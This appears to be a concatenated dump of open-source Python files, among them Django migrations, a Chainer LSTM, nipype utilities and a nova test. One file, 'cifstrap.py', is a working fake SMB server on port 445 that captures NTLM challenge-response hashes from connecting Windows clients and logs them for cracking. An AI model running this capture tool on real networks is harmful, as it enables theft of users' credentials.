router.allow_migrate(schema_editor.connection.alias, model): schema_editor.delete_model(model) def database_backwards(self, app_label, schema_editor, from_state, to_state): app_cache = to_state.render() model = app_cache.get_model(app_label, self.name) if router.allow_migrate(schema_editor.connection.alias, model): schema_editor.create_model(model) def references_model(self, name, app_label=None): return name.lower() == self.name.lower() def describe(self): return "Delete model %s" % (self.name, ) class RenameModel(Operation): """ Renames a model. """ def __init__(self, old_name, new_name): self.old_name = old_name self.new_name = new_name def state_forwards(self, app_label, state): state.models[app_label, self.new_name.lower()] = state.models[app_label, self.old_name.lower()] state.models[app_label, self.new_name.lower()].name = self.new_name del state.models[app_label, self.old_name.lower()] def database_forwards(self, app_label, schema_editor, from_state, to_state): old_app_cache = from_state.render() new_app_cache = to_state.render() old_model = old_app_cache.get_model(app_label, self.old_name) new_model = new_app_cache.get_model(app_label, self.new_name) if router.allow_migrate(schema_editor.connection.alias, new_model): schema_editor.alter_db_table( new_model, old_model._meta.db_table, new_model._meta.db_table, ) def database_backwards(self, app_label, schema_editor, from_state, to_state): old_app_cache = from_state.render() new_app_cache = to_state.render() old_model = old_app_cache.get_model(app_label, self.new_name) new_model = new_app_cache.get_model(app_label, self.old_name) if router.allow_migrate(schema_editor.connection.alias, new_model): schema_editor.alter_db_table( new_model, old_model._meta.db_table, new_model._meta.db_table, ) def references_model(self, name, app_label=None): return ( name.lower() == self.old_name.lower() or name.lower() == self.new_name.lower() ) def describe(self): return "Rename model %s to %s" % (self.old_name, self.new_name) class AlterModelTable(Operation): """ Renames a model's table """ def __init__(self, name, table): self.name = name self.table = table def state_forwards(self, app_label, state): state.models[app_label, self.name.lower()].options["db_table"] = self.table def database_forwards(self, app_label, schema_editor, from_state, to_state): old_app_cache = from_state.render() new_app_cache = to_state.render() old_model = old_app_cache.get_model(app_label, self.name) new_model = new_app_cache.get_model(app_label, self.name) if router.allow_migrate(schema_editor.connection.alias, new_model): schema_editor.alter_db_table( new_model, old_model._meta.db_table, new_model._meta.db_table, ) def database_backwards(self, app_label, schema_editor, from_state, to_state): return self.database_forwards(app_label, schema_editor, from_state, to_state) def references_model(self, name, app_label=None): return name.lower() == self.name.lower() def describe(self): return "Rename table for %s to %s" % (self.name, self.table) class AlterUniqueTogether(Operation): """ Changes the value of index_together to the target one. Input value of unique_together must be a set of tuples. """ def __init__(self, name, unique_together): self.name = name unique_together = normalize_unique_together(unique_together) self.unique_together = set(tuple(cons) for cons in unique_together) def state_forwards(self, app_label, state): model_state = state.models[app_label, self.name.lower()] model_state.options["unique_together"] = self.unique_together def database_forwards(self, app_label, schema_editor, from_state, to_state): old_app_cache = from_state.render() new_app_cache = to_state.render() old_model = old_app_cache.get_model(app_label, self.name) new_model = new_app_cache.get_model(app_label, self.name) if router.allow_migrate(schema_editor.connection.alias, new_model): schema_editor.alter_unique_together( new_model, getattr(old_model._meta, "unique_together", set()), getattr(new_model._meta, "unique_together", set()), ) def database_backwards(self, app_label, schema_editor, from_state, to_state): return self.database_forwards(app_label, schema_editor, from_state, to_state) def references_model(self, name, app_label=None): return name.lower() == self.name.lower() def describe(self): return "Alter unique_together for %s (%s constraints)" % (self.name, len(self.unique_together)) class AlterIndexTogether(Operation): """ Changes the value of index_together to the target one. Input value of index_together must be a set of tuples. """ def __init__(self, name, index_together): self.name = name self.index_together = set(tuple(cons) for cons in index_together) def state_forwards(self, app_label, state): model_state = state.models[app_label, self.name.lower()] model_state.options["index_together"] = self.index_together def database_forwards(self, app_label, schema_editor, from_state, to_state): old_app_cache = from_state.render() new_app_cache = to_state.render() old_model = old_app_cache.get_model(app_label, self.name) new_model = new_app_cache.get_model(app_label, self.name) if router.allow_migrate(schema_editor.connection.alias, new_model): schema_editor.alter_index_together( new_model, getattr(old_model._meta, "index_together", set()), getattr(new_model._meta, "index_together", set()), ) def database_backwards(self, app_label, schema_editor, from_state, to_state): return self.database_forwards(app_label, schema_editor, from_state, to_state) def references_model(self, name, app_label=None): return name.lower() == self.name.lower() def describe(self): return "Alter index_together for %s (%s constraints)" % (self.name, len(self.index_together))
bsd-3-clause
cemoody/chainer
chainer/links/connection/lstm.py
2
2516
from chainer.functions.activation import lstm from chainer import link from chainer.links.connection import linear from chainer import variable class LSTM(link.Chain): """Fully-connected LSTM layer. This is a fully-connected LSTM layer as a chain. Unlike the :func:`~chainer.functions.lstm` function, which is defined as a stateless activation function, this chain holds upward and lateral connections as child links. It also maintains *states*, including the cell state and the output at the previous time step. Therefore, it can be used as a *stateful LSTM*. Args: in_size (int): Dimensionality of input vectors. out_size (int): Dimensionality of output vectors. Attributes: upward (chainer.links.Linear): Linear layer of upward connections. lateral (chainer.links.Linear): Linear layer of lateral connections. c (chainer.Variable): Cell states of LSTM units. h (chainer.Variable): Output at the previous timestep. """ def __init__(self, in_size, out_size): super(LSTM, self).__init__( upward=linear.Linear(in_size, 4 * out_size), lateral=linear.Linear(out_size, 4 * out_size, nobias=True), ) self.state_size = out_size self.reset_state() def to_cpu(self): super(LSTM, self).to_cpu() if self.c is not None: self.c.to_cpu() if self.h is not None: self.h.to_cpu() def to_gpu(self, device=None): super(LSTM, self).to_gpu(device) if self.c is not None: self.c.to_gpu(device) if self.h is not None: self.h.to_gpu(device) def reset_state(self): """Resets the internal state. It sets None to the :attr:`c` and :attr:`h` attributes. """ self.c = self.h = None def __call__(self, x): """Updates the internal state and returns the LSTM outputs. Args: x (~chainer.Variable): A new batch from the input sequence. Returns: ~chainer.Variable: Outputs of updated LSTM units. """ lstm_in = self.upward(x) if self.h is not None: lstm_in += self.lateral(self.h) if self.c is None: xp = self.xp self.c = variable.Variable( xp.zeros((len(x.data), self.state_size), dtype=x.data.dtype), volatile='auto') self.c, self.h = lstm.lstm(self.c, lstm_in) return self.h
mit
bwall/BAMF
IntegrationQueue/static/cifstrap.py
1
6896
import socket import time import struct import sys import threading import datetime def PrintLog(message): message = "[" + str(datetime.datetime.now()) + "] " + message print message f = open("hashlog.txt", "a") f.write(message + "\n") f.close() class Handler(threading.Thread): def __init__(self, conn, addr): threading.Thread.__init__(self) self.conn = conn self.addr = addr def run(self): try: #get negotiate_protocol_request negotiate_protocol_request = self.conn.recv(1024) if not negotiate_protocol_request: self.conn.close() return dialect_location = 40 dialect_index = 0 dialect_name = "" while dialect_location < negotiate_protocol_request.__len__(): dialect_name = "" while ord(negotiate_protocol_request[dialect_location]) != 0x00: if ord(negotiate_protocol_request[dialect_location]) != 0x02: dialect_name += negotiate_protocol_request[dialect_location] dialect_location += 1 if dialect_name == "NT LM 0.12": break dialect_index += 1 dialect_location += 1 #netbios session service negotiate_protocol_response = "\x00\x00\x00\x51" #SMB Header #Server Component negotiate_protocol_response += "\xff\x53\x4d\x42" #SMB Command negotiate_protocol_response += "\x72" #NT Status negotiate_protocol_response += "\x00\x00\x00\x00" #Flags negotiate_protocol_response += "\x88" #Flags2 negotiate_protocol_response += "\x01\xc0" #Process ID High negotiate_protocol_response += "\x00\x00" #Signature negotiate_protocol_response += "\x00\x00\x00\x00\x00\x00\x00\x00" #Reserved negotiate_protocol_response += "\x00\x00" #Tree ID negotiate_protocol_response += negotiate_protocol_request[28] + negotiate_protocol_request[29] #Process ID negotiate_protocol_response += negotiate_protocol_request[30] + negotiate_protocol_request[31] #User ID negotiate_protocol_response += negotiate_protocol_request[32] + negotiate_protocol_request[33] #Multiplex ID negotiate_protocol_response += negotiate_protocol_request[34] + negotiate_protocol_request[35] #Negotiate Protocol Response #Word Count negotiate_protocol_response += "\x11" #Dialect Index negotiate_protocol_response += chr(dialect_index) + "\x00" #Security Mode negotiate_protocol_response += "\x03" #Max Mpx Count negotiate_protocol_response += "\x02\x00" #Max VCs negotiate_protocol_response += "\x01\x00" #Max Buffer Size negotiate_protocol_response += "\x04\x11\x00\x00" #Max Raw Buffer negotiate_protocol_response += "\x00\x00\x01\x00" #Session Key negotiate_protocol_response += "\x00\x00\x00\x00" #Capabilities negotiate_protocol_response += "\xfd\xe3\x00\x00" #System Time negotiate_protocol_response += "\x00" * 8#struct.pack('L', long(time.time()) * 1000L) #UTC Offset in minutes negotiate_protocol_response += "\x00\x00" #Key Length negotiate_protocol_response += "\x08" #Byte Count negotiate_protocol_response += "\x0c\x00" #Encryption Key negotiate_protocol_response += "\x11\x22\x33\x44\x55\x66\x77\x88" #Primary Domain negotiate_protocol_response += "\x00\x00" #Server negotiate_protocol_response += "\x00\x00" self.conn.sendall(negotiate_protocol_response) for x in range(0, 2): ntlmssp_request = self.conn.recv(1024) if ntlmssp_request.__len__() < 89 + 32 + 8 + 16: continue hmac = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89, 89 + 16)) header = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 16, 89 + 20)) challenge = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 24, 89 + 32 + 8)) tail = ''.join('%02x'%ord(ntlmssp_request[i]) for i in range(89 + 32 + 8, 89 + 32 + 8 + 16)) tindex = 89 + 32 + 8 + 16 + 1 account = "" while ord(ntlmssp_request[tindex]) != 0x00: account += chr(ord(ntlmssp_request[tindex])) tindex += 2 tindex += 2 domain = "" while ord(ntlmssp_request[tindex]) != 0x00: domain += chr(ord(ntlmssp_request[tindex])) tindex += 2 PrintLog(account + "::" + domain + ":1122334455667788:" + hmac + ":" + header + "00000000" + challenge + tail) #netbios session service ntlmssp_failed = "\x00\x00\x00\x23" #SMB Header #Server Component ntlmssp_failed += "\xff\x53\x4d\x42" #SMB Command ntlmssp_failed += "\x73" #NT Status ntlmssp_failed += "\x6d\x00\x00\xc0" #Flags ntlmssp_failed += "\x88" #Flags2 ntlmssp_failed += "\x01\xc8" #Process ID Hight ntlmssp_failed += "\x00\x00" #Signature ntlmssp_failed += "\x00\x00\x00\x00\x00\x00\x00\x00" #Reserved ntlmssp_failed += "\x00\x00" #Tree ID ntlmssp_failed += ntlmssp_request[28] + ntlmssp_request[29] #Process ID ntlmssp_failed += ntlmssp_request[30] + ntlmssp_request[31] #User ID ntlmssp_failed += ntlmssp_request[32] + ntlmssp_request[33] #Multiplex ID ntlmssp_failed += ntlmssp_request[34] + ntlmssp_request[35] #Negotiate Protocol Response #Word Count ntlmssp_failed += "\x00\x00\x00" self.conn.sendall(ntlmssp_failed) self.conn.close() except: pass HOST = '' PORT = 445 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) while True: conn, addr = s.accept() PrintLog('Connected by' + str(addr)) handler = Handler(conn, addr) handler.start()
mit
heistermann/wradvis
wradvis/gui.py
1
3615
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Copyright (c) 2016, wradlib Development Team. All Rights Reserved. # Distributed under the MIT License. See LICENSE.txt for more info. # ----------------------------------------------------------------------------- #!/usr/bin/env python from PyQt4 import QtGui, QtCore # other wradvis imports from wradvis.glcanvas import RadolanWidget from wradvis.mplcanvas import MplWidget from wradvis.properties import PropertiesWidget from wradvis import utils from wradvis.config import conf class MainWindow(QtGui.QMainWindow): def __init__(self, parent=None): super(MainWindow, self).__init__(parent) self.resize(825, 500) self.setWindowTitle('RADOLAN Viewer') self._need_canvas_refresh = False self.timer = QtCore.QTimer() self.timer.timeout.connect(self.reload) # initialize RadolanCanvas self.rwidget = RadolanWidget() self.iwidget = self.rwidget # initialize MplWidget self.mwidget = MplWidget() # canvas swapper self.swapper = [] self.swapper.append(self.rwidget) self.swapper.append(self.mwidget) # need some tracer for the mouse position self.rwidget.canvas.mouse_moved.connect(self.mouse_moved) self.rwidget.canvas.key_pressed.connect(self.keyPressEvent) # add PropertiesWidget self.props = PropertiesWidget() self.props.signal_slider_changed.connect(self.slider_changed) self.props.signal_playpause_changed.connect(self.start_stop) self.props.signal_speed_changed.connect(self.speed) # add Horizontal Splitter and the three widgets self.splitter = QtGui.QSplitter(QtCore.Qt.Horizontal) self.splitter.addWidget(self.props) self.splitter.addWidget(self.swapper[0]) self.splitter.addWidget(self.swapper[1]) self.swapper[1].hide() self.setCentralWidget(self.splitter) # finish init self.slider_changed() def reload(self): if self.props.slider.value() == self.props.slider.maximum(): self.props.slider.setValue(1) else: self.props.slider.setValue(self.props.slider.value() + 1) def start_stop(self): if self.timer.isActive(): self.timer.stop() else: self.timer.start() def speed(self): self.timer.setInterval(self.props.speed.value()) def slider_changed(self): try: self.data, self.meta = utils.read_radolan(self.props.filelist[self.props.actualFrame]) except IndexError: print("Could not read any data.") else: scantime = self.meta['datetime'] self.props.sliderLabel.setText(scantime.strftime("%H:%M")) self.props.date.setText(scantime.strftime("%Y-%m-%d")) self.iwidget.set_data(self.data) def mouse_moved(self, event): self.props.show_mouse(self.rwidget.canvas._mouse_position) def keyPressEvent(self, event): if isinstance(event, QtGui.QKeyEvent): text = event.text() else: text = event.text if text == 'c': self.swapper = self.swapper[::-1] self.iwidget = self.swapper[0] self.swapper[0].show() self.swapper[1].hide() def start(arg): appQt = QtGui.QApplication(arg.argv) win = MainWindow() win.show() appQt.exec_() if __name__ == '__main__': print('wradview: Calling module <gui> as main...')
mit
jeltz/rust-debian-package
src/llvm/tools/clang/utils/analyzer/SATestAdd.py
48
3075
#!/usr/bin/env python """ Static Analyzer qualification infrastructure: adding a new project to the Repository Directory. Add a new project for testing: build it and add to the Project Map file. Assumes it's being run from the Repository Directory. The project directory should be added inside the Repository Directory and have the same name as the project ID The project should use the following files for set up: - pre_run_static_analyzer.sh - prepare the build environment. Ex: make clean can be a part of it. - run_static_analyzer.cmd - a list of commands to run through scan-build. Each command should be on a separate line. Choose from: configure, make, xcodebuild """ import SATestBuild import os import csv import sys def isExistingProject(PMapFile, projectID) : PMapReader = csv.reader(PMapFile) for I in PMapReader: if projectID == I[0]: return True return False # Add a new project for testing: build it and add to the Project Map file. # Params: # Dir is the directory where the sources are. # ID is a short string used to identify a project. def addNewProject(ID, BuildMode) : CurDir = os.path.abspath(os.curdir) Dir = SATestBuild.getProjectDir(ID) if not os.path.exists(Dir): print "Error: Project directory is missing: %s" % Dir sys.exit(-1) # Build the project. SATestBuild.testProject(ID, BuildMode, IsReferenceBuild=True, Dir=Dir) # Add the project ID to the project map. ProjectMapPath = os.path.join(CurDir, SATestBuild.ProjectMapFile) if os.path.exists(ProjectMapPath): PMapFile = open(ProjectMapPath, "r+b") else: print "Warning: Creating the Project Map file!!" PMapFile = open(ProjectMapPath, "w+b") try: if (isExistingProject(PMapFile, ID)) : print >> sys.stdout, 'Warning: Project with ID \'', ID, \ '\' already exists.' print >> sys.stdout, "Reference output has been regenerated." else: PMapWriter = csv.writer(PMapFile) PMapWriter.writerow( (ID, int(BuildMode)) ); print "The project map is updated: ", ProjectMapPath finally: PMapFile.close() # TODO: Add an option not to build. # TODO: Set the path to the Repository directory. if __name__ == '__main__': if len(sys.argv) < 2: print >> sys.stderr, 'Usage: ', sys.argv[0],\ 'project_ID <mode>' \ 'mode - 0 for single file project; ' \ '1 for scan_build; ' \ '2 for single file c++11 project' sys.exit(-1) BuildMode = 1 if (len(sys.argv) >= 3): BuildMode = int(sys.argv[2]) assert((BuildMode == 0) | (BuildMode == 1) | (BuildMode == 2)) addNewProject(sys.argv[1], BuildMode)
apache-2.0
grlee77/nipype
nipype/interfaces/utility.py
9
20150
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: """Various utilities Change directory to provide relative paths for doctests >>> import os >>> filepath = os.path.dirname( os.path.realpath( __file__ ) ) >>> datadir = os.path.realpath(os.path.join(filepath, '../testing/data')) >>> os.chdir(datadir) """ import os import re from cPickle import dumps, loads import numpy as np import nibabel as nb from nipype.external import six from nipype.utils.filemanip import (filename_to_list, copyfile, split_filename) from nipype.interfaces.base import (traits, TraitedSpec, DynamicTraitedSpec, File, Undefined, isdefined, OutputMultiPath, InputMultiPath, BaseInterface, BaseInterfaceInputSpec) from nipype.interfaces.io import IOBase, add_traits from nipype.testing import assert_equal from nipype.utils.misc import getsource, create_function_from_source class IdentityInterface(IOBase): """Basic interface class generates identity mappings Examples -------- >>> from nipype.interfaces.utility import IdentityInterface >>> ii = IdentityInterface(fields=['a', 'b'], mandatory_inputs=False) >>> ii.inputs.a <undefined> >>> ii.inputs.a = 'foo' >>> out = ii._outputs() >>> out.a <undefined> >>> out = ii.run() >>> out.outputs.a 'foo' >>> ii2 = IdentityInterface(fields=['a', 'b'], mandatory_inputs=True) >>> ii2.inputs.a = 'foo' >>> out = ii2.run() # doctest: +SKIP ValueError: IdentityInterface requires a value for input 'b' because it was listed in 'fields' Interface IdentityInterface failed to run. """ input_spec = DynamicTraitedSpec output_spec = DynamicTraitedSpec def __init__(self, fields=None, mandatory_inputs=True, **inputs): super(IdentityInterface, self).__init__(**inputs) if fields is None or not fields: raise ValueError('Identity Interface fields must be a non-empty list') # Each input must be in the fields. for in_field in inputs: if in_field not in fields: raise ValueError('Identity Interface input is not in the fields: %s' % in_field) self._fields = fields self._mandatory_inputs = mandatory_inputs add_traits(self.inputs, fields) # Adding any traits wipes out all input values set in superclass initialization, # even it the trait is not in the add_traits argument. The work-around is to reset # the values after adding the traits. self.inputs.set(**inputs) def _add_output_traits(self, base): undefined_traits = {} for key in self._fields: base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _list_outputs(self): #manual mandatory inputs check if self._fields and self._mandatory_inputs: for key in self._fields: value = getattr(self.inputs, key) if not isdefined(value): msg = "%s requires a value for input '%s' because it was listed in 'fields'. \ You can turn off mandatory inputs checking by passing mandatory_inputs = False to the constructor." % \ (self.__class__.__name__, key) raise ValueError(msg) outputs = self._outputs().get() for key in self._fields: val = getattr(self.inputs, key) if isdefined(val): outputs[key] = val return outputs class MergeInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec): axis = traits.Enum('vstack', 'hstack', usedefault=True, desc='direction in which to merge, hstack requires same number of elements in each input') no_flatten = traits.Bool(False, usedefault=True, desc='append to outlist instead of extending in vstack mode') class MergeOutputSpec(TraitedSpec): out = traits.List(desc='Merged output') class Merge(IOBase): """Basic interface class to merge inputs into a single list Examples -------- >>> from nipype.interfaces.utility import Merge >>> mi = Merge(3) >>> mi.inputs.in1 = 1 >>> mi.inputs.in2 = [2, 5] >>> mi.inputs.in3 = 3 >>> out = mi.run() >>> out.outputs.out [1, 2, 5, 3] """ input_spec = MergeInputSpec output_spec = MergeOutputSpec def __init__(self, numinputs=0, **inputs): super(Merge, self).__init__(**inputs) self._numinputs = numinputs add_traits(self.inputs, ['in%d' % (i + 1) for i in range(numinputs)]) def _list_outputs(self): outputs = self._outputs().get() out = [] if self.inputs.axis == 'vstack': for idx in range(self._numinputs): value = getattr(self.inputs, 'in%d' % (idx + 1)) if isdefined(value): if isinstance(value, list) and not self.inputs.no_flatten: out.extend(value) else: out.append(value) else: for i in range(len(filename_to_list(self.inputs.in1))): out.insert(i, []) for j in range(self._numinputs): out[i].append(filename_to_list(getattr(self.inputs, 'in%d' % (j + 1)))[i]) if out: outputs['out'] = out return outputs class RenameInputSpec(DynamicTraitedSpec): in_file = File(exists=True, mandatory=True, desc="file to rename") keep_ext = traits.Bool(desc=("Keep in_file extension, replace " "non-extension component of name")) format_string = traits.String(mandatory=True, desc=("Python formatting string for output " "template")) parse_string = traits.String(desc=("Python regexp parse string to define " "replacement inputs")) use_fullpath = traits.Bool(False, usedefault=True, desc="Use full path as input to regex parser") class RenameOutputSpec(TraitedSpec): out_file = traits.File(exists=True, desc="softlink to original file with new name") class Rename(IOBase): """Change the name of a file based on a mapped format string. To use additional inputs that will be defined at run-time, the class constructor must be called with the format template, and the fields identified will become inputs to the interface. Additionally, you may set the parse_string input, which will be run over the input filename with a regular expressions search, and will fill in additional input fields from matched groups. Fields set with inputs have precedence over fields filled in with the regexp match. Examples -------- >>> from nipype.interfaces.utility import Rename >>> rename1 = Rename() >>> rename1.inputs.in_file = "zstat1.nii.gz" >>> rename1.inputs.format_string = "Faces-Scenes.nii.gz" >>> res = rename1.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'Faces-Scenes.nii.gz" # doctest: +SKIP >>> rename2 = Rename(format_string="%(subject_id)s_func_run%(run)02d") >>> rename2.inputs.in_file = "functional.nii" >>> rename2.inputs.keep_ext = True >>> rename2.inputs.subject_id = "subj_201" >>> rename2.inputs.run = 2 >>> res = rename2.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'subj_201_func_run02.nii' # doctest: +SKIP >>> rename3 = Rename(format_string="%(subject_id)s_%(seq)s_run%(run)02d.nii") >>> rename3.inputs.in_file = "func_epi_1_1.nii" >>> rename3.inputs.parse_string = "func_(?P<seq>\w*)_.*" >>> rename3.inputs.subject_id = "subj_201" >>> rename3.inputs.run = 2 >>> res = rename3.run() # doctest: +SKIP >>> print res.outputs.out_file # doctest: +SKIP 'subj_201_epi_run02.nii' # doctest: +SKIP """ input_spec = RenameInputSpec output_spec = RenameOutputSpec def __init__(self, format_string=None, **inputs): super(Rename, self).__init__(**inputs) if format_string is not None: self.inputs.format_string = format_string self.fmt_fields = re.findall(r"%\((.+?)\)", format_string) add_traits(self.inputs, self.fmt_fields) else: self.fmt_fields = [] def _rename(self): fmt_dict = dict() if isdefined(self.inputs.parse_string): if isdefined(self.inputs.use_fullpath) and self.inputs.use_fullpath: m = re.search(self.inputs.parse_string, self.inputs.in_file) else: m = re.search(self.inputs.parse_string, os.path.split(self.inputs.in_file)[1]) if m: fmt_dict.update(m.groupdict()) for field in self.fmt_fields: val = getattr(self.inputs, field) if isdefined(val): fmt_dict[field] = getattr(self.inputs, field) if self.inputs.keep_ext: fmt_string = "".join([self.inputs.format_string, split_filename(self.inputs.in_file)[2]]) else: fmt_string = self.inputs.format_string return fmt_string % fmt_dict def _run_interface(self, runtime): runtime.returncode = 0 _ = copyfile(self.inputs.in_file, os.path.join(os.getcwd(), self._rename())) return runtime def _list_outputs(self): outputs = self._outputs().get() outputs["out_file"] = os.path.join(os.getcwd(), self._rename()) return outputs class SplitInputSpec(BaseInterfaceInputSpec): inlist = traits.List(traits.Any, mandatory=True, desc='list of values to split') splits = traits.List(traits.Int, mandatory=True, desc='Number of outputs in each split - should add to number of inputs') squeeze = traits.Bool(False, usedefault=True, desc='unfold one-element splits removing the list') class Split(IOBase): """Basic interface class to split lists into multiple outputs Examples -------- >>> from nipype.interfaces.utility import Split >>> sp = Split() >>> _ = sp.inputs.set(inlist=[1, 2, 3], splits=[2, 1]) >>> out = sp.run() >>> out.outputs.out1 [1, 2] """ input_spec = SplitInputSpec output_spec = DynamicTraitedSpec def _add_output_traits(self, base): undefined_traits = {} for i in range(len(self.inputs.splits)): key = 'out%d' % (i + 1) base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _list_outputs(self): outputs = self._outputs().get() if isdefined(self.inputs.splits): if sum(self.inputs.splits) != len(self.inputs.inlist): raise RuntimeError('sum of splits != num of list elements') splits = [0] splits.extend(self.inputs.splits) splits = np.cumsum(splits) for i in range(len(splits) - 1): val = np.array(self.inputs.inlist)[splits[i]:splits[i + 1]].tolist() if self.inputs.squeeze and len(val) == 1: val = val[0] outputs['out%d' % (i + 1)] = val return outputs class SelectInputSpec(BaseInterfaceInputSpec): inlist = InputMultiPath(traits.Any, mandatory=True, desc='list of values to choose from') index = InputMultiPath(traits.Int, mandatory=True, desc='0-based indices of values to choose') class SelectOutputSpec(TraitedSpec): out = OutputMultiPath(traits.Any, desc='list of selected values') class Select(IOBase): """Basic interface class to select specific elements from a list Examples -------- >>> from nipype.interfaces.utility import Select >>> sl = Select() >>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3]) >>> out = sl.run() >>> out.outputs.out 4 >>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3, 4]) >>> out = sl.run() >>> out.outputs.out [4, 5] """ input_spec = SelectInputSpec output_spec = SelectOutputSpec def _list_outputs(self): outputs = self._outputs().get() out = np.array(self.inputs.inlist)[np.array(self.inputs.index)].tolist() outputs['out'] = out return outputs class FunctionInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec): function_str = traits.Str(mandatory=True, desc='code for function') class Function(IOBase): """Runs arbitrary function as an interface Examples -------- >>> func = 'def func(arg1, arg2=5): return arg1 + arg2' >>> fi = Function(input_names=['arg1', 'arg2'], output_names=['out']) >>> fi.inputs.function_str = func >>> res = fi.run(arg1=1) >>> res.outputs.out 6 """ input_spec = FunctionInputSpec output_spec = DynamicTraitedSpec def __init__(self, input_names, output_names, function=None, imports=None, **inputs): """ Parameters ---------- input_names: single str or list names corresponding to function inputs output_names: single str or list names corresponding to function outputs. has to match the number of outputs function : callable callable python object. must be able to execute in an isolated namespace (possibly in concert with the ``imports`` parameter) imports : list of strings list of import statements that allow the function to execute in an otherwise empty namespace """ super(Function, self).__init__(**inputs) if function: if hasattr(function, '__call__'): try: self.inputs.function_str = getsource(function) except IOError: raise Exception('Interface Function does not accept ' \ 'function objects defined interactively ' \ 'in a python session') elif isinstance(function, six.string_types): self.inputs.function_str = dumps(function) else: raise Exception('Unknown type of function') self.inputs.on_trait_change(self._set_function_string, 'function_str') self._input_names = filename_to_list(input_names) self._output_names = filename_to_list(output_names) add_traits(self.inputs, [name for name in self._input_names]) self.imports = imports self._out = {} for name in self._output_names: self._out[name] = None def _set_function_string(self, obj, name, old, new): if name == 'function_str': if hasattr(new, '__call__'): function_source = getsource(new) elif isinstance(new, six.string_types): function_source = dumps(new) self.inputs.trait_set(trait_change_notify=False, **{'%s' % name: function_source}) def _add_output_traits(self, base): undefined_traits = {} for key in self._output_names: base.add_trait(key, traits.Any) undefined_traits[key] = Undefined base.trait_set(trait_change_notify=False, **undefined_traits) return base def _run_interface(self, runtime): function_handle = create_function_from_source(self.inputs.function_str, self.imports) args = {} for name in self._input_names: value = getattr(self.inputs, name) if isdefined(value): args[name] = value out = function_handle(**args) if len(self._output_names) == 1: self._out[self._output_names[0]] = out else: if isinstance(out, tuple) and (len(out) != len(self._output_names)): raise RuntimeError('Mismatch in number of expected outputs') else: for idx, name in enumerate(self._output_names): self._out[name] = out[idx] return runtime def _list_outputs(self): outputs = self._outputs().get() for key in self._output_names: outputs[key] = self._out[key] return outputs class AssertEqualInputSpec(BaseInterfaceInputSpec): volume1 = File(exists=True, mandatory=True) volume2 = File(exists=True, mandatory=True) class AssertEqual(BaseInterface): input_spec = AssertEqualInputSpec def _run_interface(self, runtime): data1 = nb.load(self.inputs.volume1).get_data() data2 = nb.load(self.inputs.volume2).get_data() assert_equal(data1, data2) return runtime class CSVReaderInputSpec(DynamicTraitedSpec, TraitedSpec): in_file = File(exists=True, mandatory=True, desc='Input comma-seperated value (CSV) file') header = traits.Bool(False, usedefault=True, desc='True if the first line is a column header') class CSVReader(BaseInterface): """ Examples -------- >>> reader = CSVReader() # doctest: +SKIP >>> reader.inputs.in_file = 'noHeader.csv' # doctest: +SKIP >>> out = reader.run() # doctest: +SKIP >>> out.outputs.column_0 == ['foo', 'bar', 'baz'] # doctest: +SKIP True >>> out.outputs.column_1 == ['hello', 'world', 'goodbye'] # doctest: +SKIP True >>> out.outputs.column_2 == ['300.1', '5', '0.3'] # doctest: +SKIP True >>> reader = CSVReader() # doctest: +SKIP >>> reader.inputs.in_file = 'header.csv' # doctest: +SKIP >>> reader.inputs.header = True # doctest: +SKIP >>> out = reader.run() # doctest: +SKIP >>> out.outputs.files == ['foo', 'bar', 'baz'] # doctest: +SKIP True >>> out.outputs.labels == ['hello', 'world', 'goodbye'] # doctest: +SKIP True >>> out.outputs.erosion == ['300.1', '5', '0.3'] # doctest: +SKIP True """ input_spec = CSVReaderInputSpec output_spec = DynamicTraitedSpec _always_run = True def _append_entry(self, outputs, entry): for key, value in zip(self._outfields, entry): outputs[key].append(value) return outputs def _parse_line(self, line): line = line.replace('\n', '') entry = [x.strip() for x in line.split(',')] return entry def _get_outfields(self): with open(self.inputs.in_file, 'r') as fid: entry = self._parse_line(fid.readline()) if self.inputs.header: self._outfields = tuple(entry) else: self._outfields = tuple(['column_' + str(x) for x in range(len(entry))]) return self._outfields def _run_interface(self, runtime): self._get_outfields() return runtime def _outputs(self): return self._add_output_traits(super(CSVReader, self)._outputs()) def _add_output_traits(self, base): return add_traits(base, self._get_outfields()) def _list_outputs(self): outputs = self.output_spec().get() isHeader = True for key in self._outfields: outputs[key] = [] # initialize outfields with open(self.inputs.in_file, 'r') as fid: for line in fid.readlines(): if self.inputs.header and isHeader: # skip header line isHeader = False continue entry = self._parse_line(line) outputs = self._append_entry(outputs, entry) return outputs
bsd-3-clause
psiwczak/openstack
nova/tests/api/openstack/compute/contrib/test_scheduler_hints.py
6
3228
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # # Copyright 2011 OpenStack LLC. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.openstack import compute from nova.api.openstack.compute import extensions from nova.api.openstack import wsgi import nova.db.api import nova.rpc from nova import test from nova.tests.api.openstack import fakes from nova import utils UUID = fakes.FAKE_UUID class SchedulerHintsTestCase(test.TestCase): def setUp(self): super(SchedulerHintsTestCase, self).setUp() self.fake_instance = fakes.stub_instance(1, uuid=UUID) self.app = compute.APIRouter() def test_create_server_without_hints(self): def fake_create(*args, **kwargs): self.assertEqual(kwargs['scheduler_hints'], {}) return ([self.fake_instance], '') 